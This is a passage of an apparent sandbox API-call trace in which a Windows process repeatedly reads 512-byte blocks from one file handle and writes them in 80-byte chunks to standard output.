(_FileHandle=1) returned 0x50 [0177.952] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] GetFileType (hFile=0x50) returned 0x1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] GetFileType (hFile=0x50) returned 0x1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] GetFileType (hFile=0x50) returned 0x1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] GetFileType (hFile=0x50) returned 0x1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] GetFileType (hFile=0x50) returned 0x1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 
[0177.953] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.953] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.953] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.953] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.953] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] GetFileType (hFile=0x50) returned 0x1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] GetFileType (hFile=0x50) returned 0x1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] GetFileType (hFile=0x50) returned 0x1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] GetFileType (hFile=0x50) returned 0x1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 
[0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] GetFileType (hFile=0x50) returned 0x1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] GetFileType (hFile=0x50) returned 0x1 [0177.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.953] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] GetFileType (hFile=0x50) returned 0x1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] GetFileType (hFile=0x50) returned 0x1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.954] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.954] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.954] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.954] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, 
lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] GetFileType (hFile=0x50) returned 0x1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] GetFileType (hFile=0x50) returned 0x1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] GetFileType (hFile=0x50) returned 0x1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] GetFileType (hFile=0x50) returned 0x1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] GetFileType (hFile=0x50) returned 0x1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] GetFileType (hFile=0x50) returned 0x1 [0177.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.954] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] GetFileType (hFile=0x50) returned 0x1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] GetFileType (hFile=0x50) returned 0x1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.955] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.955] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.955] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.955] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] GetFileType (hFile=0x50) returned 0x1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] GetFileType (hFile=0x50) returned 0x1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] GetFileType 
(hFile=0x50) returned 0x1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] GetFileType (hFile=0x50) returned 0x1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] GetFileType (hFile=0x50) returned 0x1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] GetFileType (hFile=0x50) returned 0x1 [0177.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.955] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] GetFileType (hFile=0x50) returned 0x1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] GetFileType (hFile=0x50) returned 0x1 [0177.956] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.956] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.956] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.956] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.956] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] GetFileType (hFile=0x50) returned 0x1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] GetFileType (hFile=0x50) returned 0x1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] GetFileType (hFile=0x50) returned 0x1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] GetFileType (hFile=0x50) returned 0x1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, 
lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] GetFileType (hFile=0x50) returned 0x1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] GetFileType (hFile=0x50) returned 0x1 [0177.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.956] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] GetFileType (hFile=0x50) returned 0x1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] GetFileType (hFile=0x50) returned 0x1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.957] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.957] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.957] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.957] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] GetFileType (hFile=0x50) returned 0x1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] GetFileType (hFile=0x50) returned 0x1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] GetFileType (hFile=0x50) returned 0x1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] GetFileType (hFile=0x50) returned 0x1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] GetFileType (hFile=0x50) returned 0x1 [0177.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.957] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] GetFileType (hFile=0x50) returned 0x1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] WriteFile (in: 
hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] GetFileType (hFile=0x50) returned 0x1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] GetFileType (hFile=0x50) returned 0x1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.958] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.958] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.958] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.958] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] GetFileType (hFile=0x50) returned 0x1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] GetFileType (hFile=0x50) returned 0x1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.958] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0177.958] GetFileType (hFile=0x50) returned 0x1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] GetFileType (hFile=0x50) returned 0x1 [0177.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.958] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] GetFileType (hFile=0x50) returned 0x1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] GetFileType (hFile=0x50) returned 0x1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] GetFileType (hFile=0x50) returned 0x1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 
[0177.959] GetFileType (hFile=0x50) returned 0x1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.959] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.959] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.959] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.959] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] GetFileType (hFile=0x50) returned 0x1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] GetFileType (hFile=0x50) returned 0x1 [0177.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.959] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] GetFileType (hFile=0x50) returned 0x1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] GetFileType (hFile=0x50) returned 0x1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, 
